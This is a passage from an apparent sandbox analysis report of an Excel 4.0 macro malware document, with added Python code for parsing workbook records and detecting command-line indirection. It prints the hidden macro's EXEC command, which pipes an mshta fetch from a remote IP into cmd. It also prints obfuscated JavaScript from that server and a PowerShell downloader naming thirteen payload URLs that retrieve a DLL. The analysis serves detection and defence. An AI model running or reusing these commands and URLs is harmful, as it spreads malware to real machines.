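Added example for this report, not Joe Sandbox output. REPORT_PREVIEW is the start of the
Workbook stream exactly as the report's 'Data Raw' field prints it; the WRITEACCESS padding,
the two BOUNDSHEET records and the EOF are constructed so the walk has a sheet directory.
"""
import json
import struct

BOF, EOF, WRITEACCESS, BOUNDSHEET = 0x0809, 0x000A, 0x005C, 0x0085

SUBSTREAM = {0x0005: "workbook globals", 0x0010: "worksheet",
             0x0020: "chart", 0x0040: "Excel 4.0 macro sheet"}
SHEET_KIND = {0x00: "worksheet", 0x01: "Excel 4.0 macro sheet", 0x02: "chart", 0x06: "VBA module"}
SHEET_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}

# Verbatim from the report: BOF, INTERFACEHDR, MMS, INTERFACEEND, then the WRITEACCESS
# header (5c 00 70 00) and the start of its payload (03 00 00 'xXx').
REPORT_PREVIEW = bytes.fromhex(
    "09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00"
    "e1 00 02 00 b0 04"
    "c1 00 02 00 00 00"
    "e2 00 00 00"
    "5c 00 70 00 03 00 00 78 58 78"
)
# The report's preview continues with 0x20 padding; complete the declared 112-byte payload.
WRITEACCESS_PADDING = b" " * (112 - 6)

def boundsheet(name, state, kind, stream_pos=0x1000):
    """Build a BIFF8 BOUNDSHEET record (constructed sample data, not from the report)."""
    body = struct.pack("<IBB", stream_pos, state, kind) + bytes([len(name), 0]) + name.encode("latin-1")
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body

SAMPLE_STREAM = (REPORT_PREVIEW + WRITEACCESS_PADDING
                 + boundsheet("Sheet1", 0, 0x00)   # visible worksheet
                 + boundsheet("Macro3", 1, 0x01)   # hidden Excel 4.0 macro sheet
                 + struct.pack("<HH", EOF, 0))

def records(data):
    """Yield (type, payload) for each BIFF record; stop at a record the data truncates."""
    off = 0
    while off + 4 <= len(data):
        rtype, rlen = struct.unpack_from("<HH", data, off)
        payload = data[off + 4: off + 4 + rlen]
        yield rtype, payload
        if len(payload) < rlen:
            break
        off += 4 + rlen

def xl_unicode_string(buf, short=False):
    """XLUnicodeString (2-byte cch) or ShortXLUnicodeString (1-byte cch); flags bit 0 = UTF-16."""
    if short:
        cch, flags, body = buf[0], buf[1], buf[2:]
    else:
        cch, flags, body = struct.unpack_from("<H", buf)[0], buf[2], buf[3:]
    return body[:2 * cch].decode("utf-16-le") if flags & 1 else body[:cch].decode("latin-1")

def triage(stream):
    """Summarise the globals substream: BIFF version, last-saved-by name, sheet directory."""
    out = {"bof": None, "last_saved_by": None, "sheets": []}
    for rtype, payload in records(stream):
        if rtype == BOF:
            vers, dt, build, year = struct.unpack_from("<HHHH", payload)
            out["bof"] = {"version": hex(vers), "substream": SUBSTREAM.get(dt, hex(dt)),
                          "build": build, "year": year}
        elif rtype == WRITEACCESS:
            out["last_saved_by"] = xl_unicode_string(payload).rstrip(" ")
        elif rtype == BOUNDSHEET:
            pos, state, kind = struct.unpack_from("<IBB", payload)
            out["sheets"].append({"name": xl_unicode_string(payload[6:], short=True),
                                  "kind": SHEET_KIND.get(kind, hex(kind)),
                                  "state": SHEET_STATE.get(state & 0x03, "?"),
                                  "offset": pos})
        elif rtype == EOF:
            break
    out["hidden_macro_sheets"] = [s["name"] for s in out["sheets"]
                                  if s["kind"] == "Excel 4.0 macro sheet" and s["state"] != "visible"]
    return out

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_STREAM), indent=2))
```

Run against the real file, the same walk over the Workbook stream extracted with olefile gives the sheet directory without executing anything; a BOUNDSHEET with dt 0x01 and hsState 1 or 2 is the "hidden macro 4.0" indicator this report's verdict rests on.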
Name:Macro3
Type:3
Final:False
Visible:False
Protected:False
Formulas (post):
2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")
5,2,=HALT()
Name:Macro3
Type:3
Final:False
Visible:False
Protected:False
Formulas (pre):
2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")
5,2,=HALT()
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/28/22-21:15:07.666041 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49166 | 80 | 192.168.2.22 | 91.240.118.172
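The EXEC() formula in the Macro3 listing does not call mshta directly: it stores the command in an environment variable and pipes `echo %ooo%` into a fresh cmd.exe, which is the behaviour the "Passes commands via pipe to a shell" signature describes and which defeats naive command-line matching on "mshta http". The detector below is an added example, not part of the report: it resolves that indirection in a process command line and flags a LOLBin that is handed a remote URL. The three sample command lines are constructed; the first is the macro's own command.

```python
"""Detect the 'set VAR=<payload> & echo %VAR% | cmd' indirection seen in the EXEC() formula.

Added example for this report, not Joe Sandbox output. Feed it process-creation command
lines (Sysmon Event 1, Security 4688); SAMPLES below are constructed, [0] being the
macro's command as listed in the report.
"""
import ntpath
import re

# set VAR=<payload> & echo %VAR% | cmd   (spacing and case vary; the variable must match)
SET_ECHO_PIPE = re.compile(
    r"\bset\s+(?P<var>[A-Za-z_]\w*)=(?P<payload>.+?)\s*&\s*echo\s+%(?P=var)%\s*\|\s*(?:cmd|powershell)\b",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>|&]+", re.IGNORECASE)
LOLBINS = {"mshta", "rundll32", "regsvr32", "certutil", "wscript", "cscript",
           "powershell", "bitsadmin", "msiexec", "wmic"}

def resolve_indirection(cmdline):
    """Return (variable, hidden command) for the echo-pipe trick, or None if absent."""
    m = SET_ECHO_PIPE.search(cmdline)
    return (m.group("var"), m.group("payload").strip()) if m else None

def first_binary(command):
    """Basename of the first token, lower-cased, without .exe (Windows path rules)."""
    token = command.strip().split()[0].strip('"') if command.strip() else ""
    name = ntpath.basename(token).lower()
    return name[:-4] if name.endswith(".exe") else name

def analyze(cmdline):
    """Classify one command line; the resolved command, not the wrapper, is what gets inspected."""
    hit = resolve_indirection(cmdline)
    resolved = hit[1] if hit else cmdline
    binary = first_binary(resolved)
    urls = URL_RE.findall(resolved)
    return {
        "indirection": hit is not None,
        "variable": hit[0] if hit else None,
        "resolved": resolved if hit else None,
        "lolbin": binary if binary in LOLBINS else None,
        "urls": urls,
        # Flag the indirection itself, or a LOLBin given a remote URL without it.
        "suspicious": hit is not None or (binary in LOLBINS and bool(urls)),
    }

# Constructed samples: [0] is the macro's command from the report, [1] and [2] are benign.
SAMPLES = [
    'cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd',
    'cmd /c set PATH=C:\\tools;%PATH% & echo %PATH%',
    'cmd /c echo hello | find "h"',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(analyze(s))
```

The regex insists that the variable set and the variable echoed are the same name; a benign `set X=... & echo %PATH%` does not fire. The resolved command is what should be matched against the rest of a rule set, since the wrapper cmd.exe never shows "mshta" as its image.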
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:15:02.989120960 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.047852993 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.048145056 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.049511909 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108176947 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108724117 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108746052 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108766079 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108783007 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108795881 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108809948 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108814955 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108833075 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108834028 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108835936 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108846903 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108861923 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108865976 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108875990 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108875990 CET | 80 | 49165 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:03.108886003 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108892918 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.108908892 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:03.117295027 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:07.600526094 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:07.661833048 CET | 80 | 49166 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:07.663830042 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:07.666040897 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:07.729029894 CET | 80 | 49166 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:07.729461908 CET | 80 | 49166 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:07.729482889 CET | 80 | 49166 | 91.240.118.172 | 192.168.2.22
Jan 28, 2022 21:15:07.730539083 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.172
Jan 28, 2022 21:15:07.806807995 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:07.945823908 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:07.945950031 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:07.946124077 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.085160971 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091576099 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091607094 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091629982 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091651917 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091674089 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091696024 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091717958 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091739893 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091763020 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091785908 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.091909885 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.091936111 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230431080 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230458975 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230477095 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230495930 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230513096 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230514050 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230526924 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230545998 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230557919 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230568886 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230590105 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230607033 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230612040 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230618000 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230624914 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230642080 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230657101 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230659008 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230674982 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230691910 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230693102 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230710030 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230726004 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230729103 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230746984 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230760098 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.230765104 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230782032 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.230793953 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.369255066 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369285107 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369302034 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369321108 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369339943 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369357109 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369378090 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369395018 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369395018 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.369411945 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369426966 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.369430065 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369436979 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.369448900 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369467020 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369477034 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.369484901 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369503975 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369522095 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369538069 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Jan 28, 2022 21:15:08.369546890 CET | 49167 | 80 | 192.168.2.22 | 136.0.111.15
Jan 28, 2022 21:15:08.369554996 CET | 80 | 49167 | 136.0.111.15 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:15:07.777925014 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:15:07.797043085 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:15:07.777925014 CET | 192.168.2.22 | 8.8.8.8 | 0x56d6 | Standard query (0) | tamiladsense.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:15:07.797043085 CET | 8.8.8.8 | 192.168.2.22 | 0x56d6 | No error (0) | tamiladsense.com | (none) | 136.0.111.15 | A (IP address) | IN (0x0001)
                                    • 91.240.118.172
                                    • tamiladsense.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:15:03.049511909 CET | 0 | OUT | GET /ee/ss/se.html HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-US
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
Jan 28, 2022 21:15:03.108724117 CET | 2 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:15:03 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 32 62 32 37 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6a 50 36 34 35 45 38 4d 70 38 54 50 54 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 6f 56 35 31 31 42 59 52 75 6f 32 69 68 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 6f 56 35 31 31 42 59 52 75 6f 32 69 68 5b 30 5d 3d 27 67 25 37 38 25 36 39 25 36 45 5c 31 30 33 25 33 38 25 
33 38 5c 31 31 37 27 20 20 20 3b 6a 50 36 34 35 45 38 4d 70 38 54 50 54 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 25 7f 36 7f 31 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 1e 7d 1c 7d 18 7f 39 7f 25 7f 33 7f 37 7d 29 7f 44 7d 22 7d 2b 7f 32 7d 2b 7f 33 7f 42 7f 71 7f 79 7d 29 7f 38 7d 2c 7f 25 7f 35 7f 33 7d 18 7f 34 7d 25 7f 32 7f 69 7f 6e 7f 67 7d 22 7f 45 7d 1e 7f 34 7f 36 7f 72 7f 6f 7f 6d 7f 43 7d 1b 7f 38 7f 61 7d 18 7f 32 7d 4b 7f 36 7f 46 7f 64 7f 65 7d 22 7d 37 7f 33 7f 31 7d 29 7d 3b 7d 50 7d 29 7d 59 7f 33 7f 30 7d 22 7d 28 7d 32 7f 66 7d 1b 7f 46 7f 72 7d 56 7d 1e 7f 35 7d 5e 7d 2d 7d 5f 7d 29 7f 42 7d 1b 7d 62 7d 4b 7f 33 7d 21 7f 33 7f 34 7d 29 7f 35 7d
                                    Data Ascii: 2b27<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';jP645E8Mp8TPT=new Array();oV511BYRuo2ih=new Array();oV511BYRuo2ih[0]='g%78%69%6E\103%38%38\117' ;jP645E8Mp8TPT[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'%76%61\\162%20}}}9%37})D}"}+2}+3Bqy})8},%53}4}%2ing}"E}46romC}8a}2}K6Fde}"}731})};}P})}Y30}"}(}2f}Fr}V}5}^}-}_})B}}b}K3}!34})5}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:15:07.666040897 CET | 12 | OUT | GET /ee/ss/se.png HTTP/1.1
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
Jan 28, 2022 21:15:07.729461908 CET | 14 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:15:07 GMT
                                    Content-Type: image/png
                                    Content-Length: 1355
                                    Connection: keep-alive
                                    Last-Modified: Fri, 28 Jan 2022 09:57:38 GMT
                                    ETag: "54b-5d6a176fe2880"
                                    Accept-Ranges: bytes
                                    Data Ascii: $path = "C{Joo}:\{Joo}Prog{Joo}ramD{Joo}ata\M{Joo}ilossd.{Joo}dl{Joo}l".replace('{Joo}','');$url1 = 'http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/';$url2 = 'http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/';$url3 = 'http://tunbridgeservices.com/jfoeqhxz/zOX0/';$url4 = 'https://mypurealsystem.com/App_Start/Rhh8lKO/';$url5 = 'http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/';$url6 = 'http://engaz.shop/wp-content/MOllqUm2nb/';$url7 = 'https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/';$url8 = 'http://3-fasen.com/wp-content/3Bl0hBbW/';$url9 = 'https://vn.minino.com/wp-admin/c3WQa/';$url10 = 'https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/';$url11 = 'http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/';$url12 = 'https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/';$url13 = 'http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try {


                                    Session ID: 2
                                    Source IP: 192.168.2.22
                                    Source Port: 49167
                                    Destination IP: 136.0.111.15
                                    Destination Port: 80
                                    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Timestamp: Jan 28, 2022 21:15:07.946124077 CET
                                    kBytes transferred: 15
                                    Direction: OUT
                                    Data: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1
                                    Host: tamiladsense.com
                                    Connection: Keep-Alive
                                    Timestamp: Jan 28, 2022 21:15:08.091576099 CET
                                    kBytes transferred: 16
                                    Direction: IN
                                    Data: HTTP/1.1 200 OK
                                    Connection: Keep-Alive
                                    Set-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/
                                    Cache-Control: no-cache, must-revalidate
                                    Pragma: no-cache
                                    Last-Modified: Fri, 28 Jan 2022 20:15:08 GMT
                                    Expires: Fri, 28 Jan 2022 20:15:08 GMT
                                    Content-Type: application/x-msdownload
                                    Content-Disposition: attachment; filename="XrEtCt.dll"
                                    Content-Transfer-Encoding: binary
                                    Content-Length: 557056
                                    Date: Fri, 28 Jan 2022 20:15:08 GMT



                                    Target ID:0
                                    Start time:21:14:15
                                    Start date:28/01/2022
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f560000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:2
